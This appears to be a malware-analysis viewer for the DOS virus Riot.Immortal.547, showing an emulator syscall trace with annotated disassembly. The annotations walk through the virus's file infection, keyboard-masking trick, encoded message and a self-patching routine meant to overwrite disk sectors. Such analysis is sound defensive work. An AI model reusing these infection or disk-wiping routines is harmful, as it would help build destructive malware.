Sample viewer

vx.netlux.org/Virus.DOS.Riot.Immortal.547


Syscalls:

Time Syscall Op Syscall Name
2018-12-17T23:07:45.302673167Z 26 PC: 12a6c | Set disk transfer address
2018-12-17T23:07:45.304516512Z 53 PC: 12a72 | Get interrupt vector (Interrupt = '1' AKA 'Character input')
2018-12-17T23:07:45.313794022Z 53 PC: 12a7f | Get interrupt vector (Interrupt = '3' AKA 'Auxiliary input')
2018-12-17T23:07:45.316879Z 44 PC: 12a8a | Get time 0x12a8a: cmp dl, 0xd
; Disassembly window that follows the "Get time" call (INT 21h AH=2Ch returns
; DL = hundredths of a second). Time-based trigger: when DL <= 13 the two
; instructions after the jg execute, otherwise they are skipped.
0x12a8d: jg 0x12a93
; Port 0x21 is the interrupt-mask register of the master 8259 PIC on a
; standard PC. 0x82 sets bits 1 and 7, which masks IRQ1 (keyboard) and IRQ7.
; Presumably the visible symptom is a keyboard that stops responding.
0x12a8f: mov al, 0x82
0x12a91: out 0x21, al
; Two calls to the routine at 0x12b88 (body not shown), each with DX pointing
; at a different buffer (bp+0x2cd, then bp+0x2dd). Trace rows at PC
; 12b8d..12bd8 show this routine issuing open / read 4 bytes / seek /
; write 547 bytes / seek / write 4 bytes / close, so DX is presumably the
; file name of the file being modified.
0x12a93: lea dx, word ptr [bp + 0x2cd]
0x12a97: call 0x12b88
0x12a9a: lea dx, word ptr [bp + 0x2dd]
0x12a9e: call 0x12b88
; INT 21h AH=3Ch: create or truncate the file named at bp+0x2ef, CX=0 meaning
; no special attributes. Logged in the trace as "Create or truncate file" at
; PC 12aac.
0x12aa1: mov ah, 0x3c
0x12aa3: mov cx, 0
0x12aa6: lea dx, word ptr [bp + 0x2ef]
0x12aaa: int 0x21
; Helper at 0x12bd9 (body not shown) is called with DX = buffer at bp+0x2fd
; and SI = 0x1f (31). NOTE(review): presumably it decodes the 31-byte buffer
; in place before it is written; confirm against the helper's code.
0x12aac: lea dx, word ptr [bp + 0x2fd]
0x12ab0: mov si, 0x1f
0x12ab3: call 0x12bd9
; BX = AX, used as the file handle for the write below. This relies on the
; helper leaving AX (the handle returned by the create call) intact; the
; trace shows handle 5.
0x12ab6: mov bx, ax
; INT 21h AH=40h: write CX = 0x1f (31) bytes from DS:DX to handle BX. Logged
; as "Write 31 bytes on handle 5" at PC 12ac4. SI is not an input to this
; call; it is loaded for code after this window.
0x12ab8: mov ax, 0x4000
0x12abb: mov cx, 0x1f
0x12abe: lea si, word ptr [bp + 0x2fd]
0x12ac2: int 0x21
2018-12-17T23:07:45.319603702Z 61 PC: 12b8d | Open file (Filename = '')
2018-12-17T23:07:45.339011524Z 63 PC: 12b9b | Read file or device (Read 4 bytes on handle 5)
2018-12-17T23:07:45.345517383Z 66 PC: 12baa | Move file pointer
2018-12-17T23:07:45.347347483Z 64 PC: 12bbc | Write file or device (Write 547 bytes on handle 5)
2018-12-17T23:07:45.689585869Z 66 PC: 12bc4 | Move file pointer
2018-12-17T23:07:45.691789441Z 64 PC: 12bcf | Write file or device (Write 4 bytes on handle 5)
2018-12-17T23:07:45.695449261Z 62 PC: 12bd8 | Close file
2018-12-17T23:07:45.708745023Z 61 PC: 12b8d | Open file (Filename = '')
2018-12-17T23:07:45.72054282Z 60 PC: 12aac | Create or truncate file
2018-12-17T23:07:45.732567343Z 64 PC: 12ac4 | Write file or device (Write 31 bytes on handle 5)
2018-12-17T23:07:45.742293034Z 62 PC: 12ad3 | Close file
2018-12-17T23:07:45.75128677Z 44 PC: 12ad7 | Get time 0x12ad7: cmp dl, 0x32
; Disassembly window that follows the second "Get time" call (DL = hundredths
; of a second). When DL > 50 the message path below is skipped entirely.
0x12ada: jg 0x12b09
; Helper at 0x12bd9 (body not shown) is run on the 0x12-byte buffer at
; bp+0x1b7 before the string is printed and again afterwards with the same
; DX and SI. NOTE(review): the paired calls suggest a symmetric in-place
; decode / re-encode of the message; confirm against the helper's code.
0x12adc: mov si, 0x12
0x12adf: lea dx, word ptr [bp + 0x1b7]
0x12ae3: call 0x12bd9
; INT 21h AH=09h: print the '$'-terminated string at DS:DX. The trace's
; "Display string" row at PC 12aea corresponds to this call.
0x12ae6: mov ah, 9
0x12ae8: int 0x21
0x12aea: mov si, 0x12
0x12aed: call 0x12bd9
; INT 16h AH=00h: BIOS keyboard service, blocks until a key is pressed.
0x12af0: mov ah, 0
0x12af2: int 0x16
0x12af4: jmp 0x12b09
; NOTE(review): the jmp above skips 0x12af7..0x12b08, which is exactly 0x12
; bytes, the same length passed to the helper. These lines are most likely
; the encoded message bytes decoded as instructions by the linear
; disassembler, not real code (outsw and pushaw would also be unusual here).
0x12af7: sub byte ptr [si], cl
0x12af9: or al, 0x2e
0x12afb: adc dx, word ptr [di]
0x12afd: and byte ptr [di], cl
0x12aff: outsw dx, word ptr [si]
0x12b00: je 0x12b76
0x12b02: jno 0x12b64
0x12b04: pushaw
2018-12-17T23:07:45.754951919Z 67 PC: 12bf1 | Get or set file attributes
2018-12-17T23:07:45.76191084Z 65 PC: 12bf5 | Delete file (Filename = '')
2018-12-17T23:07:45.76955532Z 78 PC: 12b25 | Find first file
2018-12-17T23:07:45.776922388Z 61 PC: 12b8d | Open file (Filename = '')
2018-12-17T23:07:45.78455198Z 63 PC: 12b9b | Read file or device (Read 4 bytes on handle 5)
2018-12-17T23:07:45.792938634Z 66 PC: 12baa | Move file pointer
2018-12-17T23:07:45.795189155Z 64 PC: 12bbc | Write file or device (Write 547 bytes on handle 5)
2018-12-17T23:07:45.811216752Z 66 PC: 12bc4 | Move file pointer
2018-12-17T23:07:45.814280802Z 64 PC: 12bcf | Write file or device (Write 4 bytes on handle 5)
2018-12-17T23:07:45.82203102Z 62 PC: 12bd8 | Close file
2018-12-17T23:07:45.832331572Z 79 PC: 12b25 | Find next file
2018-12-17T23:07:45.837262822Z 61 PC: 12b8d | Open file (Filename = '')
2018-12-17T23:07:45.845332641Z 63 PC: 12b9b | Read file or device (Read 4 bytes on handle 5)
2018-12-17T23:07:45.852657429Z 66 PC: 12baa | Move file pointer
2018-12-17T23:07:45.855951992Z 64 PC: 12bbc | Write file or device (Write 547 bytes on handle 5)
2018-12-17T23:07:45.864949204Z 66 PC: 12bc4 | Move file pointer
2018-12-17T23:07:45.866966516Z 64 PC: 12bcf | Write file or device (Write 4 bytes on handle 5)
2018-12-17T23:07:45.875194483Z 62 PC: 12bd8 | Close file
2018-12-17T23:07:45.885111554Z 79 PC: 12b25 | Find next file
2018-12-17T23:07:45.888096205Z 61 PC: 12b8d | Open file (Filename = '')
2018-12-17T23:07:45.899347614Z 63 PC: 12b9b | Read file or device (Read 4 bytes on handle 5)
2018-12-17T23:07:45.906719311Z 66 PC: 12baa | Move file pointer
2018-12-17T23:07:45.908609955Z 64 PC: 12bbc | Write file or device (Write 547 bytes on handle 5)
2018-12-17T23:07:45.917457376Z 66 PC: 12bc4 | Move file pointer
2018-12-17T23:07:45.920129889Z 64 PC: 12bcf | Write file or device (Write 4 bytes on handle 5)
2018-12-17T23:07:45.927408091Z 62 PC: 12bd8 | Close file
2018-12-17T23:07:45.936635797Z 79 PC: 12b25 | Find next file
2018-12-17T23:07:45.940750381Z 61 PC: 12b8d | Open file (Filename = '')
2018-12-17T23:07:45.948119182Z 63 PC: 12b9b | Read file or device (Read 4 bytes on handle 5)
2018-12-17T23:07:45.955769663Z 66 PC: 12baa | Move file pointer
2018-12-17T23:07:45.958666038Z 64 PC: 12bbc | Write file or device (Write 547 bytes on handle 5)
2018-12-17T23:07:45.968761514Z 66 PC: 12bc4 | Move file pointer
2018-12-17T23:07:45.970378534Z 64 PC: 12bcf | Write file or device (Write 4 bytes on handle 5)
2018-12-17T23:07:45.978560223Z 62 PC: 12bd8 | Close file
2018-12-17T23:07:45.988103001Z 79 PC: 12b25 | Find next file
2018-12-17T23:07:45.991007441Z 61 PC: 12b8d | Open file (Filename = 'yb.com')
2018-12-17T23:07:45.999511316Z 63 PC: 12b9b | Read file or device (Read 4 bytes on handle 5)
2018-12-17T23:07:46.006922416Z 66 PC: 12baa | Move file pointer
2018-12-17T23:07:46.008834941Z 64 PC: 12bbc | Write file or device (Write 547 bytes on handle 5)
2018-12-17T23:07:46.018157474Z 66 PC: 12bc4 | Move file pointer
2018-12-17T23:07:46.021184785Z 64 PC: 12bcf | Write file or device (Write 4 bytes on handle 5)
2018-12-17T23:07:46.028336919Z 62 PC: 12bd8 | Close file
2018-12-17T23:07:46.037478433Z 42 PC: 12b50 | Get date 0x12b50: cmp dh, 0x11
; Disassembly window that follows the "Get date" call (INT 21h AH=2Ah returns
; DH = month, DL = day). Date trigger for the payload below.
; NOTE(review): DH is 1..12, so "month < 0x11 (17)" is always true and this jl
; is always taken; as written the payload is never reached from here. The
; next trace row (Set disk transfer address at PC 12b83) is consistent with
; that. Possibly decimal 11 was intended; that cannot be confirmed here.
0x12b53: jl 0x12b7c
; Second condition: skip the payload when the day of month is below 8.
0x12b55: cmp dl, 8
0x12b58: jl 0x12b7c
; Helper at 0x12bd9 (body not shown) is run on the 0x12-byte buffer at
; bp+0x1b7; BX then takes the buffer address from DX.
0x12b5a: lea dx, word ptr [bp + 0x1b7]
0x12b5e: mov si, 0x12
0x12b61: call 0x12bd9
0x12b64: mov bx, dx
; INT 21h AH=19h: get the current default drive in AL (0 = A:).
0x12b66: mov ah, 0x19
0x12b68: int 0x21
0x12b6a: mov cx, 0x25
0x12b6d: mov dx, 0
0x12b70: push ds
0x12b71: pop es
; Self-modifying store. NOTE(review): bp+0x238 appears to resolve to 0x12b78,
; the operand byte of the int at 0x12b77 (same bp base that puts bp+0x1b7 at
; 0x12af7). If so, the "int 0x19" shown below is only the on-disk byte and
; the instruction actually executed is int 0x26, the DOS absolute disk write
; (AL = drive, CX = sector count, DX = first sector, DS:BX = buffer).
; With the registers set above, that would overwrite 0x25 sectors starting
; at logical sector 0 of the current drive. Static scans of the file see
; int 0x19, so the patch has to be taken into account when triaging.
0x12b72: mov byte ptr [bp + 0x238], 0x26
0x12b77: int 0x19
; Consistent with int 25h/26h, which return with the flags word still on the
; stack; the add discards it.
0x12b79: add sp, 2
; Both skipped branches land here. INT 21h AH=1Ah sets the disk transfer
; address to DS:0x80; logged as "Set disk transfer address" at PC 12b83.
0x12b7c: mov ah, 0x1a
0x12b7e: mov dx, 0x80
0x12b81: int 0x21
2018-12-17T23:07:46.041039667Z 26 PC: 12b83 | Set disk transfer address
2018-12-17T23:07:46.043571125Z 26 PC: 12a6c | Set disk transfer address
2018-12-17T23:07:46.045088217Z 53 PC: 12a72 | Get interrupt vector (Interrupt = '1' AKA 'Character input')
2018-12-17T23:07:46.047339318Z 53 PC: 12a7f | Get interrupt vector (Interrupt = '3' AKA 'Auxiliary input')
2018-12-17T23:07:46.048982607Z 44 PC: 12a8a | Get time 0x12a8a: cmp dl, 0xd
; Disassembly window that follows the "Get time" call (INT 21h AH=2Ch returns
; DL = hundredths of a second). Time-based trigger: when DL <= 13 the two
; instructions after the jg execute, otherwise they are skipped.
0x12a8d: jg 0x12a93
; Port 0x21 is the interrupt-mask register of the master 8259 PIC on a
; standard PC. 0x82 sets bits 1 and 7, which masks IRQ1 (keyboard) and IRQ7.
; Presumably the visible symptom is a keyboard that stops responding.
0x12a8f: mov al, 0x82
0x12a91: out 0x21, al
; Two calls to the routine at 0x12b88 (body not shown), each with DX pointing
; at a different buffer (bp+0x2cd, then bp+0x2dd). Trace rows at PC
; 12b8d..12bd8 show this routine issuing open / read 4 bytes / seek /
; write 547 bytes / seek / write 4 bytes / close, so DX is presumably the
; file name of the file being modified.
0x12a93: lea dx, word ptr [bp + 0x2cd]
0x12a97: call 0x12b88
0x12a9a: lea dx, word ptr [bp + 0x2dd]
0x12a9e: call 0x12b88
; INT 21h AH=3Ch: create or truncate the file named at bp+0x2ef, CX=0 meaning
; no special attributes. Logged in the trace as "Create or truncate file" at
; PC 12aac.
0x12aa1: mov ah, 0x3c
0x12aa3: mov cx, 0
0x12aa6: lea dx, word ptr [bp + 0x2ef]
0x12aaa: int 0x21
; Helper at 0x12bd9 (body not shown) is called with DX = buffer at bp+0x2fd
; and SI = 0x1f (31). NOTE(review): presumably it decodes the 31-byte buffer
; in place before it is written; confirm against the helper's code.
0x12aac: lea dx, word ptr [bp + 0x2fd]
0x12ab0: mov si, 0x1f
0x12ab3: call 0x12bd9
; BX = AX, used as the file handle for the write below. This relies on the
; helper leaving AX (the handle returned by the create call) intact; the
; trace shows handle 5.
0x12ab6: mov bx, ax
; INT 21h AH=40h: write CX = 0x1f (31) bytes from DS:DX to handle BX. Logged
; as "Write 31 bytes on handle 5" at PC 12ac4. SI is not an input to this
; call; it is loaded for code after this window.
0x12ab8: mov ax, 0x4000
0x12abb: mov cx, 0x1f
0x12abe: lea si, word ptr [bp + 0x2fd]
0x12ac2: int 0x21
2018-12-17T23:07:46.052852301Z 61 PC: 12b8d | Open file (Filename = '�B+ə�!-')
2018-12-17T23:07:46.061001229Z 63 PC: 12b9b | Read file or device (Read 4 bytes on handle 5)
2018-12-17T23:07:46.067269211Z 62 PC: 12bd8 | Close file
2018-12-17T23:07:46.070004653Z 61 PC: 12b8d | Open file (Filename = '@�#��')
2018-12-17T23:07:46.078496796Z 60 PC: 12aac | Create or truncate file
2018-12-17T23:07:46.092229659Z 64 PC: 12ac4 | Write file or device (Write 31 bytes on handle 5)
2018-12-17T23:07:46.096642284Z 62 PC: 12ad3 | Close file
2018-12-17T23:07:46.1062963Z 44 PC: 12ad7 | Get time 0x12ad7: cmp dl, 0x32
; Disassembly window that follows the second "Get time" call (DL = hundredths
; of a second). When DL > 50 the message path below is skipped entirely.
0x12ada: jg 0x12b09
; Helper at 0x12bd9 (body not shown) is run on the 0x12-byte buffer at
; bp+0x1b7 before the string is printed and again afterwards with the same
; DX and SI. NOTE(review): the paired calls suggest a symmetric in-place
; decode / re-encode of the message; confirm against the helper's code.
0x12adc: mov si, 0x12
0x12adf: lea dx, word ptr [bp + 0x1b7]
0x12ae3: call 0x12bd9
; INT 21h AH=09h: print the '$'-terminated string at DS:DX. The trace's
; "Display string" row at PC 12aea corresponds to this call; its "Could not
; find end pointer" remark presumably means the emulator saw no '$'
; terminator in the buffer.
0x12ae6: mov ah, 9
0x12ae8: int 0x21
0x12aea: mov si, 0x12
0x12aed: call 0x12bd9
; INT 16h AH=00h: BIOS keyboard service, blocks until a key is pressed.
0x12af0: mov ah, 0
0x12af2: int 0x16
0x12af4: jmp 0x12b09
; NOTE(review): the jmp above skips 0x12af7..0x12b08, which is exactly 0x12
; bytes, the same length passed to the helper. These lines are most likely
; the encoded message bytes decoded as instructions by the linear
; disassembler, not real code (outsw and pushaw would also be unusual here).
0x12af7: sub byte ptr [si], cl
0x12af9: or al, 0x2e
0x12afb: adc dx, word ptr [di]
0x12afd: and byte ptr [di], cl
0x12aff: outsw dx, word ptr [si]
0x12b00: je 0x12b76
0x12b02: jno 0x12b64
0x12b04: pushaw
2018-12-17T23:07:46.109863606Z 9 PC: 12aea | Display string (Could not find end pointer)